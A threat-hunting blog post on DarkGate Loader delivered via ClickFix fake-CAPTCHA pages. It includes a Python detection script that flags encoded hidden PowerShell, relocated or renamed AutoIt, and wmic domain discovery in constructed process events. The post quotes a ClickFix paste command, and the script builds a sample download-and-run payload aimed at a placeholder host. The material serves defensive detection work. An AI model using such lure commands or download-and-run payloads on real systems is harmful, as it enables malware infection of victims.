032. DarkGate Delivery via ClickFix Attack: Detection and Hunting Opportunities

Hello everyone! Today we're going to talk about DarkGate Loader and ClickFix attacks. Both are quite common; I'm not sure about ClickFix, but DarkGate is used by adversaries even in CIS.

Let's look at a recent ClickFix campaign analysed by Malwarebytes Labs. The chain starts from a malicious Google ad. If the victim clicks it, he or she sees a fake "Verify you are human" page. After checking the box, the victim sees instructions on how to open the Run dialog and paste a malicious PowerShell script:

cmd /c "powershell -w h -e [base64_encoded_commands] && I am human - Ray ID:4092"

As you can see, the threat actors appended an interesting string to make the "verification" look more legitimate. You definitely can use it for detection! If we decode the Base64, we can see very common cmdlets used by adversaries for downloading and running malicious files: "Invoke-WebRequest" and "Start-Process". So, this is another detection opportunity!

To run DarkGate Loader, the threat actors usually use AutoIt, for example:

"c:\temp\test\Autoit3.exe" c:\temp\test\script.a3x

You can use this knowledge for detection and hunting:

  • Look for AutoIt interpreter and AutoIt scripts in uncommon locations
  • Look for renamed AutoIt executable - use metadata: "AutoIt v3 Script", "AutoIt3.exe", etc.

Another very common DarkGate behavior is abusing wmic for collecting domain information:

cmd.exe /c wmic ComputerSystem get domain

Yes, this is another great detection opportunity!
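To show how the three detection opportunities in this post (the ClickFix "I am human - Ray ID" string plus hidden, Base64-encoded PowerShell; AutoIt in uncommon locations or renamed but still carrying "AutoIt v3 Script" / "AutoIt3.exe" metadata; and wmic domain discovery) translate into hunting logic, here is an added example in Python. It is not code from this blog or from the Malwarebytes write-up. The process-creation events are constructed in the style of Sysmon Event ID 1 / Windows 4688 telemetry, the Base64 payload is a constructed placeholder (PowerShell's -e switch takes UTF-16LE text, so the example encodes it that way), and the "expected" AutoIt install directories are an assumption you would tune to your own estate.

```python
import base64
import binascii
import re

# Constructed sample payload (placeholder host) mirroring what the post describes:
# download with Invoke-WebRequest, then run the file with Start-Process.
# PowerShell's -e / -EncodedCommand expects Base64 of the UTF-16LE command text.
PAYLOAD_PS = r"Invoke-WebRequest -Uri 'http://example.invalid/x' -OutFile $env:TEMP\x.bin; Start-Process $env:TEMP\x.bin"
PAYLOAD_B64 = base64.b64encode(PAYLOAD_PS.encode("utf-16le")).decode("ascii")

# Constructed process-creation events (Sysmon EID 1 / 4688 style); not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "image": "C:\\Windows\\System32\\cmd.exe", "original_file_name": "Cmd.Exe",
     "file_description": "Windows Command Processor",
     "command_line": f'cmd /c "powershell -w h -e {PAYLOAD_B64} && I am human - Ray ID:4092"'},
    {"id": 2, "image": "C:\\Temp\\test\\Autoit3.exe", "original_file_name": "AutoIt3.exe",
     "file_description": "AutoIt v3 Script",
     "command_line": '"c:\\temp\\test\\Autoit3.exe" c:\\temp\\test\\script.a3x'},
    {"id": 3, "image": "C:\\Users\\Public\\svchost.exe", "original_file_name": "AutoIt3.exe",
     "file_description": "AutoIt v3 Script",  # renamed interpreter: name lies, metadata does not
     "command_line": '"C:\\Users\\Public\\svchost.exe" C:\\Users\\Public\\data.dat'},
    {"id": 4, "image": "C:\\Windows\\System32\\cmd.exe", "original_file_name": "Cmd.Exe",
     "file_description": "Windows Command Processor",
     "command_line": "cmd.exe /c wmic ComputerSystem get domain"},
    {"id": 5, "image": "C:\\Program Files (x86)\\AutoIt3\\AutoIt3.exe", "original_file_name": "AutoIt3.exe",
     "file_description": "AutoIt v3 Script",  # legitimate developer install: should stay quiet
     "command_line": '"C:\\Program Files (x86)\\AutoIt3\\AutoIt3.exe" C:\\Dev\\build.a3x'},
    {"id": 6, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "original_file_name": "PowerShell.EXE", "file_description": "Windows PowerShell",
     "command_line": "powershell -Command Get-Date"},  # benign PowerShell: should stay quiet
]

# Assumption: a sanctioned AutoIt install lives under Program Files; anything else is "uncommon".
EXPECTED_AUTOIT_DIRS = ("c:\\program files\\autoit3\\", "c:\\program files (x86)\\autoit3\\")

CLICKFIX_MARKER = re.compile(r"i am human|ray id", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_RUN_CMDLETS = re.compile(r"\b(invoke-webrequest|iwr|start-process|invoke-expression|iex|downloadstring)\b", re.I)
WMIC_DOMAIN = re.compile(r"\bwmic(?:\.exe)?\b.*\bcomputersystem\b.*\bget\b.*\bdomain\b", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -e/-enc/-EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1))
    except (ValueError, binascii.Error):
        return None
    return raw.decode("utf-16le", errors="ignore")


def detect_clickfix(cmdline):
    """Findings for the ClickFix pattern: decoy string, hidden+encoded PowerShell, decoded cmdlets."""
    findings = []
    if "powershell" not in cmdline.lower():
        return findings
    if CLICKFIX_MARKER.search(cmdline):
        findings.append("clickfix_verification_string")
    if HIDDEN_WINDOW.search(cmdline) and ENCODED_ARG.search(cmdline):
        findings.append("powershell_hidden_encoded")
    decoded = decode_encoded_command(cmdline)
    if decoded:
        hits = sorted({h.lower() for h in DOWNLOAD_RUN_CMDLETS.findall(decoded)})
        if hits:
            findings.append("encoded_cmdlets:" + ",".join(hits))
    return findings


def is_autoit_by_metadata(event):
    """PE version info survives a rename, so check OriginalFileName / FileDescription, not the path."""
    meta = (event.get("original_file_name", "") + " " + event.get("file_description", "")).lower()
    return "autoit" in meta


def detect_autoit(event):
    """Findings for AutoIt interpreter in an uncommon location or under a different file name."""
    findings = []
    image = event["image"]
    base = image.rsplit("\\", 1)[-1].lower()
    looks_like_autoit = is_autoit_by_metadata(event) or base.startswith("autoit3") \
        or ".a3x" in event["command_line"].lower()
    if not looks_like_autoit:
        return findings
    if not image.lower().startswith(EXPECTED_AUTOIT_DIRS):
        findings.append("autoit_uncommon_location")
    if is_autoit_by_metadata(event) and base != "autoit3.exe":
        findings.append("autoit_renamed_binary")
    return findings


def triage(events):
    """Map event id -> list of findings; events with nothing suspicious are omitted."""
    results = {}
    for ev in events:
        cmd = ev["command_line"]
        findings = detect_clickfix(cmd) + detect_autoit(ev)
        if WMIC_DOMAIN.search(cmd):
            findings.append("wmic_domain_discovery")
        if findings:
            results[ev["id"]] = findings
    return results


if __name__ == "__main__":
    for event_id, findings in triage(SAMPLE_EVENTS).items():
        print(event_id, findings)
```

Running it flags events 1 to 4 and stays quiet on the sanctioned AutoIt install and the benign PowerShell call; the metadata check is what catches the interpreter renamed to svchost.exe, which a path- or name-based rule alone would miss.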

See you tomorrow!
